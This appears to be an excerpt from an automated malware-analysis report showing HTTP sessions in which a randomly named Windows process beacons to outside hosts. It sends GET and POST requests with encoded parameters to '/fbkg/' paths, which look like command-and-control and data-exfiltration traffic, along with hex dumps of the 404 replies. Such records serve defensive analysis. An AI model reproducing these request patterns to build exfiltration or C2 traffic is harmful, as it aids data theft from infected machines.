0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                54192.168.11.205018183.229.19.7680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:02.111699104 CET1175OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=UungwqTjR2NkRdXrNdQfdlAnW2b4DymMYxcPl6KlSbWp+xJntUzCoedXs8frtFusR354iK6c4sMvjrt0XEEPlm9MfIU/t8N/Rw== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ayotundewrites.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:31:02.295981884 CET1176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:02 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Data Raw: 35 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 79 6f 74 75 6e 64 65 77 72 69 74 65 73 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20
                                                                                                                                                                                                Data Ascii: 5d6<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.ayotundewrites.com | Powered by www.lws.fr</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short
                                                                                                                                                                                                Nov 17, 2023 19:31:02.296065092 CET1177INData Raw: 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61
                                                                                                                                                                                                Data Ascii: error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it
                                                                                                                                                                                                Nov 17, 2023 19:31:02.299263954 CET1177INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                5483.229.19.7680192.168.11.2050181C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:02.111699104 CET1175OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=UungwqTjR2NkRdXrNdQfdlAnW2b4DymMYxcPl6KlSbWp+xJntUzCoedXs8frtFusR354iK6c4sMvjrt0XEEPlm9MfIU/t8N/Rw== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ayotundewrites.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:31:02.295981884 CET1176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:02 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Data Raw: 35 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 79 6f 74 75 6e 64 65 77 72 69 74 65 73 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20
                                                                                                                                                                                                Data Ascii: 5d6<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.ayotundewrites.com | Powered by www.lws.fr</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short
                                                                                                                                                                                                Nov 17, 2023 19:31:02.296065092 CET1177INData Raw: 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61
                                                                                                                                                                                                Data Ascii: error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it
                                                                                                                                                                                                Nov 17, 2023 19:31:02.299263954 CET1177INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                55104.21.52.18280192.168.11.2050182C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:07.587193966 CET1178OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.scoopstarz.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.scoopstarz.com
                                                                                                                                                                                                Referer: http://www.scoopstarz.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 2f 70 50 31 74 4b 6a 44 7a 78 64 76 4c 57 55 72 52 6a 42 4f 46 6d 77 48 53 51 76 53 6f 6f 4c 65 50 2f 6c 56 54 70 59 36 57 6c 2b 52 39 63 6f 62 59 58 7a 51 4f 36 6a 6c 45 76 4f 75 59 6c 55 4e 4d 72 6a 2b 76 46 6b 6a 4d 39 68 54 53 57 4d 4d 45 30 37 6d 49 73 36 57 69 67 6d 4a 59 34 43 51 33 30 69 46 62 52 74 2f 30 56 30 4f 74 44 35 4b 4b 76 6c 51 46 73 44 41 4b 4a 79 32 59 68 6e 56 61 56 43 4c 38 61 52 65 51 55 31 56 58 62 38 43 31 6a 50 71 4d 69 39 61 6d 43 38 66 56 44 43 35 33 6e 79 71 55 62 6f 73 70 4d 59 37 67 43 6f 44 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=k/pP1tKjDzxdvLWUrRjBOFmwHSQvSooLeP/lVTpY6Wl+R9cobYXzQO6jlEvOuYlUNMrj+vFkjM9hTSWMME07mIs6WigmJY4CQ30iFbRt/0V0OtD5KKvlQFsDAKJy2YhnVaVCL8aReQU1VXb8C1jPqMi9amC8fVDC53nyqUbospMY7gCoDw==
                                                                                                                                                                                                Nov 17, 2023 19:31:07.857115984 CET1179INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:07 GMT
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FQa%2FkhjwMi2xX1cjySm9hfnKIte2dWJ%2FRolAiHtUYM4t15wecMdXdlZ95B6ntTrrSbJW%2FhzoeNAgDwG%2FEwz07BjbhzJ7nZqxhoS9LxkxCh1E8%2Fl1gVwY5Whr%2FLOfkYs6cjB5UAc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a0c80bfafc352-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                55192.168.11.2050182104.21.52.18280C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:07.587193966 CET1178OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.scoopstarz.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.scoopstarz.com
                                                                                                                                                                                                Referer: http://www.scoopstarz.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 2f 70 50 31 74 4b 6a 44 7a 78 64 76 4c 57 55 72 52 6a 42 4f 46 6d 77 48 53 51 76 53 6f 6f 4c 65 50 2f 6c 56 54 70 59 36 57 6c 2b 52 39 63 6f 62 59 58 7a 51 4f 36 6a 6c 45 76 4f 75 59 6c 55 4e 4d 72 6a 2b 76 46 6b 6a 4d 39 68 54 53 57 4d 4d 45 30 37 6d 49 73 36 57 69 67 6d 4a 59 34 43 51 33 30 69 46 62 52 74 2f 30 56 30 4f 74 44 35 4b 4b 76 6c 51 46 73 44 41 4b 4a 79 32 59 68 6e 56 61 56 43 4c 38 61 52 65 51 55 31 56 58 62 38 43 31 6a 50 71 4d 69 39 61 6d 43 38 66 56 44 43 35 33 6e 79 71 55 62 6f 73 70 4d 59 37 67 43 6f 44 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=k/pP1tKjDzxdvLWUrRjBOFmwHSQvSooLeP/lVTpY6Wl+R9cobYXzQO6jlEvOuYlUNMrj+vFkjM9hTSWMME07mIs6WigmJY4CQ30iFbRt/0V0OtD5KKvlQFsDAKJy2YhnVaVCL8aReQU1VXb8C1jPqMi9amC8fVDC53nyqUbospMY7gCoDw==
                                                                                                                                                                                                Nov 17, 2023 19:31:07.857115984 CET1179INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:07 GMT
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FQa%2FkhjwMi2xX1cjySm9hfnKIte2dWJ%2FRolAiHtUYM4t15wecMdXdlZ95B6ntTrrSbJW%2FhzoeNAgDwG%2FEwz07BjbhzJ7nZqxhoS9LxkxCh1E8%2Fl1gVwY5Whr%2FLOfkYs6cjB5UAc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a0c80bfafc352-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                56104.21.52.18280192.168.11.2050183C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:10.213340044 CET1180OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.scoopstarz.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.scoopstarz.com
                                                                                                                                                                                                Referer: http://www.scoopstarz.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 2f 70 50 31 74 4b 6a 44 7a 78 64 70 65 65 55 75 32 33 42 4a 6c 6d 7a 65 53 51 76 59 49 6f 48 65 50 6a 6c 56 51 6c 49 36 6b 42 2b 51 64 4d 6f 61 5a 58 7a 56 4f 36 6a 74 6b 75 47 6a 34 6c 66 4e 4d 33 64 2b 75 35 6b 6a 4d 70 68 4a 46 57 4d 4f 30 30 36 2b 34 73 39 42 53 67 72 43 34 34 49 51 33 34 32 46 61 31 74 2f 6b 70 30 66 66 37 35 41 37 76 6b 42 31 73 2f 56 61 4a 31 76 49 68 70 56 61 52 77 4c 39 69 76 65 68 51 31 62 57 37 38 46 31 6a 4d 6c 4d 69 36 48 32 44 59 4d 55 65 50 2b 32 54 36 39 47 53 5a 69 37 67 49 75 45 4c 34 66 4c 53 57 4b 75 65 51 55 7a 4b 65 4a 41 51 66 37 58 78 52 56 51 51 77 43 4e 6c 61 68 48 39 36 6d 65 67 30 6b 6a 79 43 57 48 64 76 76 6e 62 67 66 4e 74 38 64 67 54 4e 49 70 75 64 63 4a 50 67 36 64 37 58 30 52 55 73 78 56 46 6c 38 36 33 70 79 49 59 62 7a 4a 74 79 76 7a 55 4f 4c 67 2f 4b 6f 68 66 6f 51 6a 38 5a 33 4c 72 78 34 59 4f 43 32 72 39 74 73 2b 4f 45 46 4d 48 6d 6e 42 67 4a 4d 37 51 2f 64 64 2f 77 50 65 51 6c 32 64 69 37 58 79 55 57 6c 52 71 62 39 7a 68 31 2b 38 6e 58 6f 30 38 4b 30 36 34 77 2f 54 6f 2f 6d 46 4c 37 6c 35 58 41 42 52 53 37 63 57 4f 51 52 43 72 36 54 43 56 58 76 52 6f 70 70 73 35 53 57 79 4d 4d 44 36 41 48 6f 6c 6b 47 54 4f 68 32 31 54 72 6c 38 6f 47 58 67 76 43 35 6a 6f 4b 42 50 4e 4a 6b 47 4e 54 30 57 79 36 35 58 63 69 77 78 70 46 38 6e 43 77 38 78 7a 69 57 6e 76 4e 6d 4f 43 54 7a 47 57 52 63 77 6d 65 63 49 52 43 37 4c 4c 6f 71 4a 59 72 47 78 61 32 61 54 44 50 35 4f 41 4b 33 64 50 44 5a 66 34 74 66 75 50 61 69 56 41 6b 6e 52 51 77 62 66 7a 56 39 4b 78 6d 61 4f 77 31 48 43 76 49 49 59 67 63 3d
                                                                                                                                                                                                Data Ascii: T6I=k/pP1tKjDzxdpeeUu23BJlmzeSQvYIoHePjlVQlI6kB+QdMoaZXzVO6jtkuGj4lfNM3d+u5kjMphJFWMO006+4s9BSgrC44IQ342Fa1t/kp0ff75A7vkB1s/VaJ1vIhpVaRwL9ivehQ1bW78F1jMlMi6H2DYMUeP+2T69GSZi7gIuEL4fLSWKueQUzKeJAQf7XxRVQQwCNlahH96meg0kjyCWHdvvnbgfNt8dgTNIpudcJPg6d7X0RUsxVFl863pyIYbzJtyvzUOLg/KohfoQj8Z3Lrx4YOC2r9ts+OEFMHmnBgJM7Q/dd/wPeQl2di7XyUWlRqb9zh1+8nXo08K064w/To/mFL7l5XABRS7cWOQRCr6TCVXvRopps5SWyMMD6AHolkGTOh21Trl8oGXgvC5joKBPNJkGNT0Wy65XciwxpF8nCw8xziWnvNmOCTzGWRcwmecIRC7LLoqJYrGxa2aTDP5OAK3dPDZf4tfuPaiVAknRQwbfzV9KxmaOw1HCvIIYgc=
                                                                                                                                                                                                Nov 17, 2023 19:31:10.471175909 CET1181INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:10 GMT
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
